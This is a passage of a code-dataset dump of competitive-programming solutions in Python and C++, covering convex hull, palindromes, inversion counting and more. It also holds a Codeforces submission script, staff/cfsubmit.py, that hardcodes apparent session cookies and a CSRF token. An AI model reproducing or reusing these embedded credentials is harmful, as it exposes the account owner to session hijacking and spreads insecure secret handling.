"/CodeForce/0540/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport collections\n\nresult = [(0, 0)] * 200010\nls = [(0, 0)] * 200010\ntoget = []\n\ndef inverses_merge(l1, r1, l2, r2):\n counter = l1\n l = l1\n while (l1 < r1) and (l2 < r2):\n if ls[l1][0] < ls[l2][0]:\n result[counter] = ls[l1]\n l1 += 1\n else:\n result[counter] = ((ls[l2][0], ls[l2][1] + r1 - l1))\n l2 += 1\n counter += 1\n while l1 < r1:\n result[counter] = ls[l1]\n counter += 1\n l1 += 1\n while l2 < r2:\n result[counter] = ls[l2]\n counter += 1\n l2 += 1\n for i in range(l, counter, 1):\n ls[i] = result[i]\n\ndef inverses_get(l, r):\n if r - l == 0:\n return\n if r - l == 1:\n ls[l] = (toget[l], 0)\n return\n m = (l + r) // 2\n inverses_get(l, m)\n inverses_get(m, r)\n inverses_merge(l, m, m, r)\n\nn = int(sys.stdin.readline())\nd = {}\nfor i in range(n):\n x, y = list(map(int, sys.stdin.readline().split()))\n if not d.__contains__(x):\n d[x] = x\n if not d.__contains__(y):\n d[y] = y\n t = d[x]\n d[x] = d[y]\n d[y] = t\nindex = {}\nd = collections.OrderedDict(sorted(d.items()))\ni = 0\n\nfor t in (d.items()):\n toget.append(t[1])\n index[t[1]] = i\n i += 1\n\ns = 0\ninverses_get(0, len(toget))\nx = result\nfor i in range(len(toget)):\n s += x[i][1]\n s += abs(x[i][0] - d[x[i][0]]) - abs(i - index[x[i][0]])\nsys.stdout.write(str(s) + \"\\n\")\n" }, { "alpha_fraction": 0.5302104353904724, "alphanum_fraction": 0.5437881946563721, "avg_line_length": 35.82500076293945, "blob_id": "1dbb7410408391d44007abaf73fae4d662d3f46f", "content_id": "c77b9c5ddcbbdb364cfdf7ec1e0d6127ca7b01f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1473, "license_type": "no_license", "max_line_length": 248, "num_lines": 40, "path": "/staff/convexHull.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define pointtt template<typename T>\npointtt struct point\n{\n T x, y;\n point(T _x, T _y) : x(_x), y(_y) {}\n point(){}\n point operator+(point b) { return point(x + b.x, y + b.y); }\n point operator-() { return point(-x, -y); }\n T operator!() { return x * x + y * y; }\n bool operator<(point b) { return x == b.x ? y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(point<T>&a,point<T>&b){return!point<T>(a+-b);}\npointtt int orientation(point<T>&a,point<T>&b,point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?1:q<0?-1:0;}\npointtt vector<point<T>>convexHull(vector<point<T>>a){sort(a.begin(),a.end());int n=a.size(),j=-1,k=0;ROF(i,n-2,0)a.push_back(a[i]);fori(a.size()){for(;j>k&&orientation(a[j-1],a[j],a[i])!=1;--j);a[++j]=a[i];if(!k&&i==n-1)k=j;}a.resize(j);return a;}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n int n;\n cin >> n;\n vector<point<int>> a(n);\n fori(n)\n cin >> a[i];\n a = convexHull(a);\n a.push_back(a[0]);\n double ans = 0;\n for (int i = 1; i < a.size(); ++i)\n ans += sqrt(dist(a[i - 1], a[i]));\n cout.precision(10);\n cout << fixed << ans << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.5516431927680969, "alphanum_fraction": 0.5516431927680969, "avg_line_length": 23.882352828979492, "blob_id": "f916e5a3b16ac9f0f03e7faa710dca9eaf325269", "content_id": "9883d28c673739a36dbe4e8c8da2141c1333da0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 50, "num_lines": 17, "path": "/CodeForce/0501/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "from collections import defaultdict\nimport sys\n\nq = int(sys.stdin.readline())\nold = defaultdict(str)\nnew = defaultdict(str)\nfor i in range(q):\n a, b = sys.stdin.readline().split()\n if a in new.values():\n old[b] = old[a]\n new[old[a]] = b\n else:\n old[b] = a\n new[a] = b\nsys.stdout.write(str(new.keys().__len__()) + \"\\n\")\nfor x in new.keys():\n sys.stdout.write(x + \" \" + new[x] + \"\\n\")\n\n\n\n" }, { "alpha_fraction": 0.3919413983821869, "alphanum_fraction": 0.45299145579338074, "avg_line_length": 24.483871459960938, "blob_id": "295ad5dd48d9cb55821d48f706dcb2423b071050", "content_id": "b65a91a783959119ec9df2f9f3838f407426555c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 884, "license_type": "no_license", "max_line_length": 97, "num_lines": 31, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.06/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\r\nimport sys\r\n \r\nax, ay, bx, by = map(int, open(\"lattice.in\", \"r\").readline().split())\r\nfile = open(\"lattice.out\", \"w\")\r\n \r\na2 = ax ** 2 + ay ** 2\r\nb2 = bx ** 2 + by ** 2\r\nab = ax * bx + ay * by\r\nif ab == 0:\r\n    if a2 < b2:\r\n        file.write(\"1 0\")\r\n    else:\r\n        file.write(\"0 1\")\r\n    sys.exit()\r\ndef f(p, q):\r\n    return a2 * (p ** 2) + 2 * ab * p * q + b2 * (q ** 2)\r\n \r\nx = b2 / ab\r\ny = a2 / ab\r\neps = 0.0000000001\r\na = [   math.floor(x), -1, math.ceil(x + eps), -1, -1, math.floor(y), -1, math.ceil(y + eps), \r\n    math.floor(x), 1, math.ceil(x + eps), 1, 1, math.floor(y), 1, math.ceil(y + eps), 0, 1, 1, 0]\r\nmn = f(a[0], a[1])\r\ni = 0\r\nfor j in range(2, len(a), 2):\r\n    temp = f(a[j], a[j + 1])\r\n    if mn > temp:\r\n        mn = temp\r\n        i = j\r\nfile.write(str(a[i]) + \" \" + str(a[i + 1]))" }, { "alpha_fraction": 0.49886661767959595, "alphanum_fraction": 0.5171752572059631, "avg_line_length": 25.79906463623047, "blob_id": "4ff903257ad669378ec1f2a6176fb729fb0db63d", "content_id": "a30abde46a782ef15d45a18480857256f83cac21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5735, "license_type": "no_license", "max_line_length": 175, "num_lines": 214, "path": "/trains/nsu/8.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 June 2014\n#include <bits/stdc++.h>\n#include <iomanip>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"input\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void readln(Head& head, Tail&... tail);\nvoid writeln(){printf(\"\\n\");}void writeln2(){printf(\"\\n\");}void readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nstring s, t;\n\nint atoi(string &s, int &i)\n{\n int temp = s[i++] - '0';\n while (s[i] - '0' <= 9 && s[i] - '0' >= 0)\n temp = temp * 10 + s[i++] - '0';\n i--;\n return temp;\n}\n\nint updateC(string &s, int i, int temp, int inb, bool b)\n{\n int c1 = 0;\n if (s[i - 1] >= '0' && s[i - 1] <= '9')\n c1 = temp * (b ? inb : 1);\n return c1;\n}\n\nvoid parse(string s, int &x1, int &y1, int &c1)\n{\n int temp = 1, inb = 1, sig = 1;\n bool b = false;\n for (int i = 0; i < s.size(); ++i)\n switch (s[i])\n {\n case '(' :\n b = true;\n inb = 1;\n break;\n case '=' :\n sig = -1;\n case ')' :\n c1 += updateC(s, i, temp, inb, b);\n b = false;\n temp = sig;\n inb = 1;\n break;\n\n case 'x' :\n x1 += temp * (b ? inb : 1);\n inb = 1;\n break;\n\n case 'y' :\n y1 += temp * (b ? inb : 1);\n inb = 1;\n break;\n\n case '-' :\n c1 += updateC(s, i, temp, inb, b);\n if (b)\n inb = -1;\n else\n temp = sig * -1;\n// (b ? inb : temp) = -1;\n break;\n\n case '+' :\n c1 += updateC(s, i, temp, inb, b);\n inb = 1;\n if (!b)\n temp = sig;\n break;\n\n default :\n (b ? inb : temp) *= atoi(s, i);\n }\n}\n\nvoid run()\n{\n readln(s, t);\n s += ')';\n t += ')';\n int aa, bb, cc, dd, ee, ff;\n aa = bb = cc = dd = ee = ff = 0;\n parse(s, aa, bb, cc);\n parse(t, dd, ee, ff);\n// writeln(a, \"x +\", b, \"y =\", -c);\n// riteln(d, \"x +\", e, \"y =\", -f);\n double x, y;\n double a, b, c, d, e, f;\n a = aa;\n b = bb;\n c = cc;\n d = dd;\n e = ee;\n f = ff;\n y = f * a - c * d;\n y /= b * d - e * a;\n x = b * f - c * e;\n x /= a * e - b * d;\n cout << fixed;\n cout << setprecision(9) << x << \"\\n\";\n cout << setprecision(9) << y << \"\\n\";\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nvoid print(double a){printf(\" \" DOUBLEFORMAT,a);}\nvoid print(int a){printf(\" %d\",a);}\nvoid print(string a){printf(\" %s\",a.c_str());}\nvoid print(long long a){printf(\" %lld\",a);}\nvoid print(unsigned long a){printf(\" %ld\",a);}\nvoid print(unsigned int a){printf(\" %d\",a);}\nvoid print(char a){printf(\" %c\",a);}\nvoid print_no_space(double a){printf(DOUBLEFORMAT, a);}\nvoid print_no_space(int a){printf(\"%d\", a);}\nvoid print_no_space(string a){printf(\"%s\", a.c_str());}\nvoid print_no_space(long long a){printf(\"%lld\", a);}\nvoid print_no_space(unsigned long a){printf(\"%ld\", a);}\nvoid print_no_space(unsigned int a){printf(\"%d\", a);}\nvoid print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a);\ntemplate<class Type>\nvoid print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print(pair<Type1, Type2>& a){print(a.first);print(a.second);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print_no_space(pair<Type1, Type2>&a){print_no_space(a.first);print(a.second);}\ntemplate <class Head, class... Tail>\nvoid writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail>\nvoid writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\nvoid read(double &a){scanf(\"%lf\",&a);}\nvoid read(int &a){scanf(\"%d\",&a);}\nvoid read(string &a){cin>>a;}\nvoid read(long long &a){scanf(\"%lld\",&a);}\nvoid read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2>\nvoid read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type>\nvoid read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail>\nvoid readln(Head& head,Tail&... tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.4878803491592407, "alphanum_fraction": 0.5092831254005432, "avg_line_length": 31.86440658569336, "blob_id": "7cc7fe1c03e53b2c7684b950e399490d14bf50b8", "content_id": "0a4cd42af24bd1fd1b165dfddc40e29698814eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3878, "license_type": "no_license", "max_line_length": 174, "num_lines": 118, "path": "/CodeForce/1326/D2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nauto manaker(const string& s)\n{\n int n = SZ(s);\n vector<vector<int>> p(2,vector<int>(n,0));\n for(int z=0,l=0,r=0;z<2;z++,l=0,r=0)\n for(int i=0;i<n;i++)\n {\n if(i<r) p[z][i]=min(r-i+!z,p[z][l+r-i+!z]);\n int L=i-p[z][i], R=i+p[z][i]-!z;\n while(L-1>=0 && R+1<n && s[L-1]==s[R+1]) p[z][i]++,L--,R++;\n if(R>r) l=L,r=R;\n }\n return p;\n}\n\nvoid run()\n{\n string s;\n readln(s);\n auto get = [](const string& s) -> string {\n int n = SZ(s);\n auto p = manaker(s);\n vector<set<int>> forward(n);\n int l = 0;\n int r = n;\n int mx = 0;\n fori(n)\n {\n if (int len = p[0][i]; len)\n forward[i - len].insert(-i - len + 1);\n if (int len = p[1][i]; len)\n forward[i - len].insert(-i - len);\n }\n int i = -1;\n int j = n;\n do\n {\n int ci = i;\n auto it = forward[i + 1].upper_bound(-j);\n if (it != forward[i + 1].end())\n ci = -*it;\n else if (ci + 1 < j)\n ci++;\n //writeln(i, j, s.substr(0, ci + 1) + s.substr(j));\n if (int cur = ci + (n - j); cur > mx)\n mx = cur,\n l = ci,\n r = j;\n ++i;\n --j;\n }\n while (i < j && s[i] == s[j]);\n return s.substr(0, l + 1) + s.substr(r);\n };\n string first = get(s);\n reverse(all(s));\n string second = get(s);\n if (SZ(first) >= SZ(second))\n writeln(first);\n else\n writeln(second);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5206394791603088, "alphanum_fraction": 0.5602481365203857, "avg_line_length": 31.230770111083984, "blob_id": "365732a74121d0ba52fff1c6c830149cee89e213", "content_id": "9b35ee4086cfaf7144ef014359c3b0eb5582fd46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4191, "license_type": "no_license", "max_line_length": 148, "num_lines": 130, "path": "/staff/cfsubmit.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nimport os\nimport requests\nimport sys\nimport itertools\nimport time\nfrom time import sleep\n\n# Edit these four variables according to your needs:\nx_user = '''\nd00ef4d59145a678537c71c8a14b63cd4e4d86f10e4a6b1c1bb926d6159a696bfae78d577e719e40\n'''[1:-1]\ncsrf_token = '''\n936df2b684e1514a5a82a0c0bfdbfa77\n'''[1:-1]\ncf_domain = 'com'\nusername = 'igorajn'\nuser_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36'\nweird_name = '39ce7'\nweird_val = 'CFdhiqLe'\njsession = 'CEB1FBBB3256E0B89739343AC12C26D1-n1'\n\n#{{{\nupdateInterval = 2 #in seconds\ncountOfSubmits = 3 #count of previous submits, shown after done submission. If count == 1, nothing happens.\next_id = {\n \"cpp\": \"42\",\n \"hs\": \"12\",\n \"java\": \"36\",\n \"py\": \"41\",\n}\n#}}}\n\n#{{{\ndef getSubmissions():\n while True:\n try:\n data = requests.get(\"http://codeforces.ru/api/user.status?handle=\" + username + \"&from=1&count=\" + str(countOfSubmits)).json()['result']\n except:\n sleep(updateInterval)\n continue\n if countOfSubmits > 1:\n print(\"last submits\")\n for s in reversed(data[1:]):\n try:\n print(str(s['problem']['contestId']) + s['problem']['index'] + \" \" + \\\n '{:>20}'.format(s['verdict'] + \"(\" + str(s['passedTestCount'] + 1) + \") \") + str(s['timeConsumedMillis']) + \" ms\")\n except:\n print()\n sys.stdout.flush()\n s = data[0]\n try:\n print(str(s['problem']['contestId']) + s['problem']['index'] + \" \" + \\\n '{:>20}'.format(s['verdict'] + \"(\" + str(s['passedTestCount'] + 1) + \") \") + str(s['timeConsumedMillis']) + \" ms\")\n if s['verdict'] != 'TESTING':\n break\n except:\n print()\n sleep(updateInterval)\n#}}}\n\n#{{{\n#if len(sys.argv) > 2:\n #countOfSubmits = int(sys.argv[2])\n #getSubmissions()\n #sys.exit()\n\n#if len(sys.argv) < 2:\n #print(\"Solution filename not specified\")\n #sys.exit()\n\n#if not os.path.exists(sys.argv[1]):\n #print(\"Solution file does not exist or not enough rights to read it\")\n #sys.exit()\n\n#filename = os.path.basename(sys.argv[1])\n\n#contest_id = ''.join(itertools.takewhile(lambda c: c.isdigit(), filename))\n#problem_index = ''.join(itertools.takewhile(lambda c: c != '.', filename[len(contest_id):])).upper()\n#extension = filename[len(contest_id) + len(problem_index) + 1:].lower()\n\n#if (len(contest_id) == 0) or (len(problem_index) == 0):\n #contest_id = os.path.dirname(os.path.realpath(sys.argv[1])).split(os.sep)[-1]\n #temp = filename.split('.')\n #problem_index = temp[0].upper()\n #extension = temp[-1].lower()\n #if (not contest_id.isdigit() or (len(problem_index) > 2)):\n #print(\"Incorrect filename format. Example: 123A.cpp or 123/A.cpp\")\n #sys.exit()\n\n#if not extension in ext_id:\n #print(\"Unknown extension. Please check 'ext_id' variable\")\n #sys.exit()\n\n#}}}\n\n#parts = {\n #\"csrf_token\": csrf_token,\n #\"action\": \"submitSolutionFormSubmitted\",\n #\"submittedProblemIndex\": problem_index,\n #\"source\": open(sys.argv[1], \"rb\"),\n #\"programTypeId\": ext_id[extension],\n #\"sourceFile\": \"\",\n #\"_tta\": \"222\"\n#}\n\nurl = \"http://codeforces.com/api/contest.status?contestId=522&from=1&count=3\"\n#url = \"http://codeforces.\" + cf_domain + \"/contest/\" + contest_id + \"/problem/\" + problem_index,\n#print(\"you' ve submitted \" + contest_id + problem_index + extension)\nr = requests.post(url,\n params = {\n \"csrf_token\" : csrf_token\n },\n# files = parts,\n headers = {\n \"User-Agent\" : user_agent,\n },\n cookies = {\n \"X-User\": x_user,\n \"JSESSIONID\": jsession,\n weird_name: weird_val,\n \"70a7c28f3de\" : \"d5gpvi9c2ugfd2t9yg\"\n }\n)\nprint(r.text)\nif r.status_code == requests.codes.ok:\n print(\"Solution is successfully sent. Current time is \" + time.strftime(\"%H:%M:%S\"))\n\ngetSubmissions()\n\n" }, { "alpha_fraction": 0.47398844361305237, "alphanum_fraction": 0.49132949113845825, "avg_line_length": 18.22222137451172, "blob_id": "e351ab8b0fd6b520ff52c21fc3fae47a75ff0a1c", "content_id": "32c6ce287c3b6d64777765c0d9a12b3745ef9c49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 37, "num_lines": 9, "path": "/CodeForce/0522/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nm = {'polycarp' : 0}\nfor i in range(n):\n s, r, t = input().lower().split()\n m[s] = m[t] + 1\nmx = 0\nfor y in m.values():\n mx = max(mx, y)\nprint(mx)\n" }, { "alpha_fraction": 0.4916055500507355, "alphanum_fraction": 0.5246943831443787, "avg_line_length": 29.073530197143555, "blob_id": "bded58c77d322ab89a21d63f3eb0402b577bf03a", "content_id": "5422fe148b55f124f72479af0fbfa58ce2199705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6135, "license_type": "no_license", "max_line_length": 167, "num_lines": 204, "path": "/CodeForce/0807/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (#define -> typedef, readln(vector) patched, version from 27 March 2017)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\nvector<int> prices = {500, 1000, 1500, 2000, 2500, 3000};\nvector<int> pricesrev = {3000, 2500, 2000, 1500, 1000, 500};\nmap<int, int> qs;\nvector<int> q(5, 0);\nint n;\n\nint getScores(vector<vector<int>>& people, int fakes, vector<int> prices)\n{\n bool ok = true;\n forj(5)\n {\n int z = qs[prices[j]];\n int a = n + fakes;\n int ac = (a - z * q[j]) / z;\n auto check = [&](int ac) {\n return ac >= 0 && ac <= fakes && z * (q[j] + ac) <= a && (z == 32 || a < 2 * z * (q[j] + ac));\n };\n if (people[0][j] == -1) ok &= check(0);\n else ok &= check(ac) || check(fakes);\n }\n\n return ok;\n}\n\nint result(vector<int>& x, vector<int> prices)\n{\n int ans = 0;\n fori(x.size())\n if (x[i] != -1)\n ans += (prices[i] / 250) * (250 - x[i]);\n return ans;\n}\n\nvector<vector<int>> checks;\nvoid run()\n{\n qs[500] = 1;\n qs[1000] = 2;\n qs[1500] = 4;\n qs[2000] = 8;\n qs[2500] = 16;\n qs[3000] = 32;\n readln(n);\n vector<vector<int>> people(n, vector<int>(5));\n readln(people);\n fori(n)\n forj(5)\n if (people[i][j] != -1)\n q[j]++;\n\n //-1 check\n\n vector<int> ppp;\n\tvector<vector<int>> ccc;\n forj(5)\n if ((people[0][j] != -1 && people[0][j] <= people[1][j]) || people[1][j] == -1)\n ppp.pb(3000),\n\t\t\tccc.pb(prices);\n else\n ppp.pb(500),\n\t\t\tccc.pb(pricesrev);\n int v = result(people[0], ppp);\n int p = result(people[1], ppp);\n //writeln(v, p, ppp);\n //cout.flush();\n if (v <= p)\n {\n writeln(-1);\n return;\n }\n\n //int a = 1000, b = 1000, c = 500, d = 500, e = 500;\n double time = clock();\n for (int a = 0; a < prices.size(); ++a)\n for (int b = 0; b < prices.size(); ++b)\n for (int c = 0; c < prices.size(); ++c)\n for (int d = 0; d < prices.size(); ++d)\n for (int e = 0; e < prices.size(); ++e)\n if (result(people[0], {prices[a], prices[b], prices[c], prices[d], prices[e]}) >\n result(people[1], {prices[a], prices[b], prices[c], prices[d], prices[e]}))\n checks.pb({prices[a], prices[b], prices[c], prices[d], prices[e]});\n forn(fakes, 4000)\n {\n for (auto& check: checks)\n {\n int can = getScores(people, fakes, check);\n if (can)\n {\n writeln(fakes);\n return;\n }\n //if ((clock() - time) / CLOCKS_PER_SEC > 1.9)\n //{\n //writeln(-1);\n //return;\n //}\n }\n }\n writeln(-1);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,valarray<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5095295310020447, "alphanum_fraction": 0.5226778984069824, "avg_line_length": 35.043479919433594, "blob_id": "2fd99e7135e6642bcd1caeb10ccffe874c36a612", "content_id": "e4755881d51cc5ab0bce92472c08bcbc76817bab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8290, "license_type": "no_license", "max_line_length": 174, "num_lines": 230, "path": "/CodeForce/1359/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 